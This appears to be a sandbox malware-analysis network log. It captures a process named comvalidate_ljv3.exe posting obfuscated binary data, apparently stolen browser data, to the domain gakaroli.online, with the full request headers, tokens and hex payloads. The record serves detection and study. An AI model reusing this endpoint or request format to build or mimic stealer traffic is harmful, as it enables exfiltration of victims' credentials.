                                                                                                2024-11-30 01:25:13 UTC545INData Raw: 33 37 64 61 0d 0a 00 00 00 00 00 00 00 00 6a 7a 00 00 05 2f 7e 34 73 0e 83 04 04 00 10 00 16 e0 04 83 04 02 0a 10 02 04 e0 1f 6f 5e 84 31 39 b9 14 f1 57 07 5d 00 04 00 10 00 16 e0 04 5d 00 02 0a 10 02 04 e0 1f 86 0e 75 af d0 08 10 6a f7 0b d9 0d 0a 00 14 00 16 cb 08 d9 0d 02 0a 10 02 04 cb 9a 84 b2 02 eb e2 66 92 69 ab b4 37 a9 a1 28 17 b4 37 b4 04 02 80 06 08 00 14 00 16 cb 08 80 06 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 15 17 bb b0 36 36 b2 3a af 0d 1e 04 01 00 14 00 16 cb 08 1e 04 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 15 c5 07 a0 0a 1d 00 14 00 16 cb 08 a0 0a 02 0a 10 02 04 cb 9a 84 b2 02 eb e2 66 92 69 33 3a 38 2e 23 b4 36 b2 2d b4 36 36 b0 2e b9 b4 3a b2 b6 b0 37 b0 b3 b2 39 17 3c b6 36 b7 0e c4 06 09 00 14 00 16 cb 08 c4 06 02 0a 10 02
                                                                                                Data Ascii: 37dajz/~4so^19W]]ujfi7(7fi66:fifi3:8.#6-66.:79<6
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: b2 32 22 21 28 05 56 0e 0c 00 14 00 16 cb 08 56 0e 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 15 17 b9 b8 36 b4 3a b2 96 b9 34 b6 fc 03 f2 0c 04 00 10 00 16 e0 04 f2 0c 02 0a 10 02 04 e0 1f 24 a7 7a 92 72 a1 1f 57 06 02 45 09 02 00 14 00 16 cb 08 45 09 02 0a 10 02 04 cb 6a 84 b2 02 eb e2 66 92 69 15 17 5c 0d 0a 03 04 00 10 00 16 e0 04 0a 03 02 0a 10 02 04 e0 e6 01 57 17 53 56 51 72 96 bc 02 b2 05 1e 00 14 00 16 cb 08 b2 05 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 a7 ba 3a 36 b7 b7 b5 ab b4 37 a0 38 38 a1 36 b0 b9 b9 b4 b1 2e 32 b0 3a b0 17 35 b9 b7 37 af 07 a1 03 04 00 10 00 16 e0 04 a1 03 02 0a 10 02 04 e0 39 2a 01 45 6c 7d 07 20 a9 95 0d 63 07 0b 00 14 00 16 cb 08 63 07 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 28 39 b2 33 b2 39 b2 37 b1 b2 b9
                                                                                                Data Ascii: 2"!(VV9fi6:4$zrWEEjfi\WSVQr9fi:67886.2:579*El} cc9fi(9397
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: 04 e0 aa 61 81 23 19 37 87 46 dc 45 07 65 07 08 00 14 00 16 c2 08 65 07 02 0a 10 02 04 c2 e6 5e e2 40 57 4a 42 b3 af ee 6a 55 1e 3d 79 51 7d 03 0b ab 0b 17 00 14 00 16 cb 08 ab 0b 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 b0 39 b6 b7 39 bc 15 bb b0 36 36 b2 3a 17 36 b6 32 31 96 36 b7 b1 b5 f2 02 f1 05 04 00 10 00 16 e0 04 f1 05 02 0a 10 02 04 e0 39 56 8c 66 f1 01 8a 03 34 0f 07 a2 06 08 00 14 00 16 c2 08 a2 06 02 0a 10 02 04 c2 1f 86 c5 57 13 c8 53 54 e9 36 4d 42 5a bf 68 b6 3b f9 08 88 04 17 00 14 00 16 cb 08 88 04 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 a4 a6 a0 28 10 22 b2 b1 39 bc 38 3a b2 32 10 28 b0 b9 b9 bb b7 39 32 f8 0d be 03 04 00 10 00 16 e0 04 be 03 02 0a 10 02 04 e0 1f b6 03 c0 ab e1 05 a5 6e d0 03 0e 0c 04 00 10 00 16 e0 04 0e 0c 02
                                                                                                Data Ascii: a#7FEee^@WJBjU=yQ}fi9966:62169Vf4WST6MBZh;9fi("98:2(92n
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: 14 00 16 cb 08 c5 0a 02 0a 10 02 04 cb c8 84 b2 02 eb e2 66 92 69 23 b7 39 b6 24 b4 b9 3a b7 39 bc cf 0b cc 0d 24 00 14 00 16 cb 08 cc 0d 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 bb b0 36 36 b2 3a b9 2e a3 ba b0 39 32 b0 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 b2 04 15 06 08 00 14 00 16 c2 08 15 06 02 0a 10 02 04 c2 39 a6 16 93 c9 e2 39 e6 87 16 9e 86 80 95 02 04 55 4d 0f 53 0b 0d 00 14 00 16 cb 08 53 0b 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 a4 a6 a0 28 10 28 b0 b9 b9 bb b7 39 32 45 0b e8 02 04 00 10 00 16 e0 04 e8 02 02 0a 10 02 04 e0 39 02 42 6b 90 55 44 0e 55 4e 06 e5 03 04 00 10 00 16 e0 04 e5 03 02 0a 10 02 04 e0 e6 5b 19 95 a2 85 0c f0 67 f8 0b 50 02 11 00 14 00 16 cb 08 50 02 02 0a 10 02 04 cb 39 84 b2 02 eb e2
                                                                                                Data Ascii: fi#9$:9$fi66:.92.&6:9.6;62199UMSS9fi((92E9BkUDUN[gPP9
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: 00 16 cb 08 1d 00 02 0a 10 02 04 cb c2 84 b2 02 eb e2 66 92 69 a1 aa 29 29 a2 27 2a 9b 01 18 04 08 00 14 00 16 c2 08 18 04 02 0a 10 02 04 c2 bf a4 1b 09 2f 2b cd b2 a1 14 93 1c 66 5c f6 50 73 de 03 9d 08 04 00 10 00 16 e0 04 9d 08 02 0a 10 02 04 e0 1f 5d 81 c1 36 0b 66 51 f6 e9 0d 03 01 08 00 14 00 16 c2 08 03 01 02 0a 10 02 04 c2 e6 f2 23 01 d5 ae 89 1b a1 42 ab 14 9c d9 b2 f9 73 1d 0e 60 0f 05 00 14 00 16 cb 08 60 0f 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 15 17 b7 b9 3a fb 06 e8 0d 08 00 14 00 16 c2 08 e8 0d 02 0a 10 02 04 c2 c2 9e 8c 4e 33 09 eb ee 76 2f 04 5b 7a 7e d0 0c a4 7b 0d ef 0c 0c 00 14 00 16 cb 08 ef 0c 02 0a 10 02 04 cb c8 84 b2 02 eb e2 66 92 69 38 39 b7 33 b4 36 b2 b9 17 b4 37 b4 0a 0c ef 02 04 00 10 00 16 e0 04 ef 02 02 0a 10 02 04
                                                                                                Data Ascii: fi))'*/+f\Ps]6fQ#Bs``9fi:N3v/[z~{fi89367
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: 66 92 69 3b 37 b1 2e 29 b2 b0 36 2b 27 a1 2e b1 36 b4 b2 37 3a 2e a0 38 38 22 b0 3a b0 87 0e 3e 0c 06 00 14 00 16 cb 08 3e 0c 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 a0 39 b6 b7 39 bc 22 07 61 09 13 00 14 00 16 cb 08 61 09 02 0a 10 02 04 cb 71 84 b2 02 eb e2 66 92 69 1c 18 9a 18 9c 99 9a 9b 99 19 1c 1c 1a 9c 9b 9a 19 1a 18 2f 0a 8a 0b 06 00 14 00 16 cb 08 8a 0b 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 b1 b7 37 33 b4 b3 1c 0f b6 09 04 00 10 00 16 e0 04 b6 09 02 0a 10 02 04 e0 39 de 79 4d de 89 7f 28 1b 38 09 96 08 05 00 14 00 16 cb 08 96 08 02 0a 10 02 04 cb e6 84 b2 02 eb e2 66 92 69 15 17 3b 37 b1 91 06 4f 05 04 00 10 00 16 e0 04 4f 05 02 0a 10 02 04 e0 bf bd bd c5 0d ea bb a0 c8 86 0c a4 01 04 00 10 00 16 e0 04 a4 01 02 0a 10 02 04 e0 1f 09 03
                                                                                                Data Ascii: fi;7.)6+'.67:.88":>>fi99"aaqfi/fi739yM(8fi;7OO
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: a2 02 04 00 10 00 16 e0 04 a2 02 02 0a 10 02 04 e0 39 15 c7 a2 1c 42 c1 c7 d9 3d 0d 71 0c 02 00 14 00 16 cb 08 71 0c 02 0a 10 02 04 cb 1f 84 b2 02 eb e2 66 92 69 32 31 93 09 b3 0b 0b 00 14 00 16 cb 08 b3 0b 02 0a 10 02 04 cb 39 84 b2 02 eb e2 66 92 69 26 b7 b1 b0 36 10 a9 3a b0 3a b2 4e 00 c0 01 04 00 10 00 16 e0 04 c0 01 02 0a 10 02 04 e0 c2 a3 f3 06 46 f4 f5 63 83 b6 00 89 03 04 00 10 00 16 e0 04 89 03 02 0a 10 02 04 e0 e6 48 e0 83 d3 1f e6 e6 16 d6 0e c7 02 0e 00 14 00 16 cb 08 c7 02 02 0a 10 02 04 cb c8 84 b2 02 eb e2 66 92 69 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 3e 0e 4a 0b 21 00 14 00 16 cb 08 4a 0b 02 0a 10 02 04 cb 9a 84 b2 02 eb e2 66 92 69 33 3a 38 2e ab b4 37 a9 a1 28 2e a4 37 b4 af 23 b4 36 b2 b9 2e b9 b2 36 b2 b1 3a b2 32 17 b4 37 b4 ba
                                                                                                Data Ascii: 9B=qqfi219fi&6::NFcHfi199>J!Jfi3:8.7(.7#6.6:27
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: 00 16 cb 08 1f 04 02 0a 10 02 04 cb aa 84 b2 02 eb e2 66 92 69 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 2a b2 36 b2 b3 39 b0 b6 2e 22 b2 b9 b5 3a b7 38 2e 3a 32 b0 3a b0 05 0a b8 0d 12 00 14 00 16 cb 08 b8 0d 02 0a 10 02 04 cb c8 84 b2 02 eb e2 66 92 69 33 b7 39 b6 34 b4 b9 3a b7 39 bc 17 b9 b8 36 b4 3a b2 c3 04 21 01 07 00 14 00 16 cb 08 21 01 02 0a 10 02 04 cb 96 84 b2 02 eb e2 66 92 69 a3 39 b0 31 31 b2 39 ea 09 b5 0a 04 00 10 00 16 e0 04 b5 0a 02 0a 10 02 04 e0 c2 b7 c6 34 2c e1 21 a4 ec bd 03 8a 05 04 00 10 00 16 e0 04 8a 05 02 0a 10 02 04 e0 71 25 f2 28 fb 73 f4 4d 3e d4 0d cb 00 11 00 14 00 16 cb 08 cb 00 02 0a 10 02 04 cb c2 84 b2 02 eb e2 66 92 69 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 0f 0f 5c 04 08 00 14 00 16 cb 08 5c 04 02 0a 10 02 04 cb
                                                                                                Data Ascii: fi79.*69.":8.:2:fi394:96:!!fi91194,!q%(sM>fi49199\\
                                                                                                2024-11-30 01:25:13 UTC1369INData Raw: bb b0 36 36 b2 3a b9 89 0c 4e 07 04 00 10 00 16 e0 04 4e 07 02 0a 10 02 04 e0 e6 91 62 01 db c6 64 64 1e b9 08 d8 07 04 00 10 00 16 e0 04 d8 07 02 0a 10 02 04 e0 71 10 b4 6d ad d2 a7 f3 57 11 06 29 03 46 00 14 00 16 cb 08 29 03 02 0a 10 02 04 cb e6 84 b2 02 eb e2 66 92 69 3b 37 b1 2e 29 b2 b0 36 2b 27 a1 2e b1 36 b4 b2 37 3a 2e 26 b7 b1 b0 36 a0 38 38 22 b0 3a b0 2e 3b 37 b1 3b b4 b2 bb b2 39 17 32 2e 38 b0 b9 b9 bb b7 39 32 b9 17 32 b2 b1 39 bc 38 3a b2 32 96 b6 b0 b9 3a b2 39 af 03 6e 0d 04 00 10 00 16 e0 04 6e 0d 02 0a 10 02 04 e0 6a cf 35 e3 60 9b 33 86 a5 4c 06 ad 09 0b 00 14 00 16 cb 08 ad 09 02 0a 10 02 04 cb c2 84 b2 02 eb e2 66 92 69 26 b7 b1 b0 36 10 a9 3a b0 3a b2 88 09 62 05 06 00 14 00 16 cb 08 62 05 02 0a 10 02 04 cb c2 84 b2 02 eb e2 66 92
                                                                                                Data Ascii: 66:NNbddqmW)F)fi;7.)6+'.67:.&688":.;7;92.892298:2:9nnj5`3Lfi&6::bbf


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.449772172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:14 UTC406OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 53
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:14 UTC53OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 03 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii:
                                                                                                2024-11-30 01:25:15 UTC749INHTTP/1.1 200 OK
                                                                                                Date: Sat, 30 Nov 2024 01:25:15 GMT
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1gFKB4KhsxTNPLv4wN4YDY4sC%2Fsyvl1fEtx5F2myDazn61WuaFrhLr9Dkfi6VwCkOH7ZS8KdZ75Pe2H1SUiyt7nFgu74wd3WLeaya9ekU2PNmlTVzap%2FL49%2BcQxCdZXD2s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70ae2aa6c0f87-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2556&min_rtt=1983&rtt_var=1153&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1095&delivery_rate=1472516&cwnd=250&unsent_bytes=0&cid=0158ed7e3e6db088&ts=667&x=0"
                                                                                                2024-11-30 01:25:15 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 00 00 00 00 02 00 00 00 fe ff ff ff 91 90 0d 0a
                                                                                                Data Ascii: 12
                                                                                                2024-11-30 01:25:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.449777172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:17 UTC407OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 208
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:17 UTC208OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 95 00 00 00 6e 36 cb 0f 00 00 00 00 00 00 00 00 81 00 00 00 37 1b e5 87 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 37 1b e5 87 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 64 02 12 14 81 2a 92 69 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Data Ascii: Mn67I`H17(((d*i
                                                                                                2024-11-30 01:25:17 UTC798INHTTP/1.1 204 No Content
                                                                                                Date: Sat, 30 Nov 2024 01:25:17 GMT
                                                                                                Connection: close
                                                                                                page: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKeZhjnAxl3XZ1JVzdeOuwW9TII1QYEu05BZLDV9hOhZ%2FpE89PJWOEw6Ynu3JDT6UGnofyXPfzzpF9K%2F8WPACE47lAdY4EHtV6bFNYeXBmcd2msh62AkHY7hwaJehM3Enlk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8ea70aef191b4369-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1709&rtt_var=657&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1251&delivery_rate=1646926&cwnd=230&unsent_bytes=0&cid=a6ce39b3788bc08a&ts=673&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449782172.67.141.1334431900C:\Users\user\AppData\Local\Temp\comvalidate_ljv3.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-11-30 01:25:20 UTC410OUTPOST /edward-gringhuis?n5f8dheaoxp1mi4y=REF0AMG0DYE07A1KJEKnDvfx5AkaGHK6z3%2FRLg4j8F7BB8jUOIO64N4TGWCKjeux HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
                                                                                                action: 4j2t2f3D5V3YYt9mowf8zLO9ifXE7c3OZzWnORDbTiiXtldcrFZRGfVbmDPxUEc0
                                                                                                Content-Length: 103358
                                                                                                Host: gakaroli.online
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 4d 00 00 00 08 00 00 00 33 3d 01 00 0d 5a 5b 3b 00 00 00 00 00 00 00 00 66 01 00 00 86 2d ad 9d c9 60 48 49 4c 60 48 53 a1 34 39 b7 b6 b2 ec 1a a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 c8 cc 60 48 d3 22 b2 33 b0 ba 36 3a ec 1e a1 1d 2e aa b9 b2 39 b9 2e 35 b7 37 b2 b9 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e aa b9 b2 39 10 22 b0 3a b0 2e 22 b2 33 b0 ba 36 3a ec 1a b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a1 34 39 b7 b6 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 26 b7 b3 b4 37 10 22 b0 3a b0 ec 98 b1 34 39 b7 b6 b4
                                                                                                Data Ascii: M3=Z[;f-`HIL`HS49.9.57.88":.&6.6.49.9":`H"36:.9.57.88":.&6.6.49.9":."36:49199.49.8936."36:.&7":49
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 0e 0a b0 ae 1a 02 c9 7d eb bb 24 5f 21 36 1e 3d 95 74 6c 23 93 dc 4b ae ac 63 d8 2e 42 28 ec 3d 29 0b 22 4b 68 0d b0 34 65 2d 41 25 5e 58 a6 79 d6 ae 2b f5 0a ee 6f 1d 9a 1f 18 a6 ab ab 1b e1 92 62 7b 59 dd e9 5a 00 45 ff 88 6b 83 50 79 f7 cb 52 ec 46 0f 0c 1f c5 3a 05 90 28 6d 35 72 59 cc e6 c8 42 59 af 0f 23 1e 4b 31 a9 f4 05 bd 1e 31 d9 f5 0d 34 57 2f 63 7a c1 3d 25 09 b9 1e 68 e1 84 85 be a1 c7 96 07 27 7e d6 ce 84 af ae a8 f2 26 3c ba 5f a1 e4 78 f9 84 24 6e ee 9f 2c 3f f9 6d 56 47 2b ce b0 d3 83 28 24 6f 40 82 42 35 0e 8e 47 96 e1 2b c2 26 8d bc cb 7b ca a3 90 55 7b f0 8f e6 e0 6f e0 c1 34 b6 d1 3b b3 6b f2 14 b2 ad 80 90 87 3f 7b f1 a1 6e af c1 70 8c dd 78 3e b2 4a ba a8 72 42 03 31 e7 b1 34 5d 70 b8 89 4d 6a 4b ee 8d 73 dd 0f d0 dd ca 37 bb 70 2c
                                                                                                Data Ascii: }$_!6=tl#Kc.B(=)"Kh4e-A%^Xy+ob{YZEkPyRF:(m5rYBY#K114W/cz=%h'~&<_x$n,?mVG+($o@B5G+&{U{o4;k?{npx>JrB14]pMjKs7p,
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 7b 2b aa 64 f2 25 00 11 e0 d7 46 92 c5 6d 54 8f 0e f4 54 da 53 36 af 94 2b a9 bf 63 7f 35 1f 1f e0 d8 33 bd e5 95 4e 2d 94 40 f6 35 00 b5 bf a5 de 93 03 1f 8a 5d e9 ca da 53 ca f7 3d 70 13 5c d5 a5 54 6e ba e9 b8 97 2a e1 35 64 1c a0 27 21 9c f5 c1 79 c0 83 94 66 e7 95 16 a5 d2 a0 96 ab d3 f9 24 52 9b 09 21 03 4a 27 e9 2c 3e 9d 7d 98 1e 93 93 77 b1 90 f8 51 9e 31 89 5f b5 74 bc 47 9f 43 bb 99 03 ee 68 f7 dc 7a ba a7 68 5b 3c 72 86 69 61 e3 1a 75 8e 49 63 e5 40 27 c4 fc f2 53 c3 27 f4 dc 2b de 20 1a bb c0 59 de 24 1e bb 1d d2 80 f3 20 14 05 ab 9e ed d6 f7 26 82 b8 10 a3 91 45 07 5b 76 67 aa 0a d8 52 9a bb 18 cd d1 da 1e d4 2f a7 ec 36 0a 80 cc b8 b9 6f 72 a1 8b f3 48 19 1b 13 c0 3e b8 45 c8 33 57 eb e6 01 9e 01 c3 0d 62 4b 61 80 4c 78 3d d9 50 40 71 55 0b
                                                                                                Data Ascii: {+d%FmTTS6+c53N-@5]S=p\Tn*5d'!yf$R!J',>}wQ1_tGChzh[<riauIc@'S'+ Y$ &E[vgR/6orH>E3WbKaLx=P@qU
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 48 86 54 3c 24 9f 15 76 b3 9d 93 06 07 9a e6 c8 98 30 f8 48 3f 6c 0a 91 e7 ea d7 61 8a e9 80 38 38 55 b0 4f 46 80 47 87 76 d1 3d 1a 57 24 0d 07 18 52 45 7a 13 d8 29 57 19 62 9b 2e 1d a9 65 50 f8 3c 5c 13 9e 87 b8 49 6a 47 0b 42 4b fd 26 81 11 1b da 21 8f 87 b1 7c 65 e8 e1 93 ab e6 e4 da db 21 6a cd 1c 3e f8 cb 61 fe ff 77 64 c6 82 1d 92 74 c6 bc 11 e8 cd 61 0c 77 b9 3a 58 6c eb 39 de 8c 56 f0 3f 93 87 e5 3e 9a df 4b 7f 06 d0 9b 6b 44 42 8f 45 be dc e7 14 10 31 ae 95 7a f0 18 43 8b 0c 9e 1e 7b ea 1e ed 3d a5 42 ef c4 e1 38 bf e4 f9 82 1d 96 74 c6 b2 11 e8 dd 61 0c 4f f9 3a 58 5c 69 39 be 0d 56 f0 bd 93 87 93 be 9a 83 cb 7f 16 50 9b 5b 04 4e 8f 05 35 dc e7 19 10 31 33 96 7a 5d 58 43 ed 0d 1e 26 3b 4b 2e cf 81 a5 42 5a c4 e1 22 bf e4 dc 82 6d ec 61 ce 7b 5c
                                                                                                Data Ascii: HT<$v0H?la88UOFGv=W$REz)Wb.eP<\IjGBK&!|e!j>awdtaw:Xl9V?>KkDBE1zC{=B8taO:X\i9VP[N513z]XC&;K.BZ"ma{\
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 62 98 4c a4 26 ee 8f 70 8c f9 e6 b0 e2 bf 6b 9e 37 92 96 3b 1b eb 87 95 51 a0 82 9b 49 45 10 d9 f1 d8 2a 84 a3 da 5f a7 a6 ec 27 2d 37 0e f5 1f d0 53 36 e3 26 ed 42 5b 6d a8 8f a7 6c 3f 72 f5 07 95 17 b3 03 88 11 16 de 37 29 cd 1c 41 19 a3 7a 6f f5 cc 7c ea 5f ea 99 1c 16 90 42 63 23 8a 2a 7c c3 d8 9f 8f a9 23 c7 23 ca 6c 39 87 00 60 18 68 8c cf 20 f3 ea 69 6d 3c d4 28 16 ca 45 e2 21 58 d7 97 8a c5 f1 dc 71 1b 37 44 87 92 37 44 30 a9 fa a0 da 15 b8 a1 06 36 db a8 ca 4c ff 41 7f 76 a4 7c a4 46 e5 f9 ab d7 96 5e 9f a5 26 f9 6d 76 ca fc e5 cb b3 f8 11 2f 4c b6 2e ac 54 9a c6 38 e9 4c f7 47 0a 93 68 62 32 b4 91 9a f7 c7 54 48 46 bb 1f 36 83 cf de 09 0e 9f b3 8a 71 f1 78 f9 0a c2 5c 7e 7c e4 24 ab a8 13 68 ed a9 d2 d6 4a 21 46 8b ab 0c ed da 98 ef 8a 8f 1b 61
                                                                                                Data Ascii: bL&pk7;QIE*_'-7S6&B[ml?r7)Azo|_Bc#*|##l9`h im<(E!Xq7D7D06LAv|F^&mv/L.T8LGhb2THF6qx\~|$hJ!Fa
                                                                                                2024-11-30 01:25:20 UTC15331OUTData Raw: 35 ec 92 69 31 f3 e2 fc 1f 28 57 dd 6c ff 30 e0 5a 2b ab c6 c1 ea 3e 76 5f 4e b2 dc 73 c6 59 0c 3f 9c dd 65 c5 55 2c fb d8 ad fe 68 dd d4 da 1a ef 5a 6b 67 4b 9a ac 2d 1d cf 95 23 cb 63 9f 8b c9 d7 cd 6b ec d9 23 bf 08 66 b9 16 8f ff 34 b3 35 9d 0b 97 76 79 2f 0d f0 b7 15 27 f0 6b 73 7d f6 d6 da 36 b6 83 e1 51 33 47 7c bf 00 00 00 20 86 e0 7e 9f 00 00 00 28 9f 78 7f 87 00 00 00 6a 87 5e ff 81 00 00 00 fa f1 ff 00 28 a5 81 02 96 00 00 04 04 00 03 58 30 2c 27 43 0b 43 ff ff ff ff ff ff ff ff 97 00 0a 00 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 2e a2 32 b3 b2 2e 38 39 b7 33 b4 36 b2 b9 2e 22 b2 33 b0 ba 36 3a 2e 24 b4 b9 3a b7 39 bc 80 00 08 00 00 78 80 00 00 00 00 00 4b 04 00 00 00 00 00 00 f6 ed a7 36 ed 6b 8e 60 b8 69 59 96 e3 47 d6 5c d4 d5 13
                                                                                                Data Ascii: 5i1(Wl0Z+>v_NsY?eU,hZkgK-#ck#f45vy/'ks}6Q3G| ~(xj^(X0,'CC49199.2.8936."36:.$:9xK6k`iYG\
                                                                                                2024-11-30 01:25:20 UTC11372OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 bd 66 e9 fd 79 d1 b1 b1 e8 ff eb d6 26 eb f1 67 d2 3d d6 8d cb 9d ee 25 fb 30 7d f9 7f e4 99 a9 e3 67 a6 ca 67 8e bd 79 cc d4 29 1d b2 bb bb 5d 5f db 2b de 5d db e9 d6 3a e3 8b c5 bd 85 d1 c7 9e 0b 96 47 fb d5 b5 5a 57 cb 8b 6d f8 f2 2d 3e d2 a9 77 5b 0d e9 ce 37 d5 8c bb 5b 44 6f db 53 c8 96 19 ca 3b cb 25 d2 fc 25 b3 5f 3a 37 75 f2 b9 d2 f3 e7 4e 3d 7b 6c cc 85 d2 d3 d3 17 4a 63 a5 97 ce 1d fb 6a b9 f3 e7 ca 67 1e fb 69 d4 f1 c5 a3 1f 2e 0c be f0 c2 34 f8 61 35 af 75 ca cc 5c a9 37 62 ee 25 da 69 d6 4a 9d b8 d2 9e 99 af 5f 6a c5 ed da d2 37 ee 19 e3 4f c6 9e 5e b2 7f 69 77 29 d6 2d 1d ba 7d 6e 6a e4 d4 99 f4 5f 77 96 ba f1 3b d1 99 5c c3 e9 e7 ce 95 ce 1f ff 66 99 d2 f9 d3 a7 de 38 3f 55 1a 1f d9 93
                                                                                                Data Ascii: pfy&g=%0}ggy)]_+]:GZWm->w[7[DoS;%%_:7uN={lJcjgi.4a5u\7b%iJ_j7O^iw)-}nj_w;\f8?U
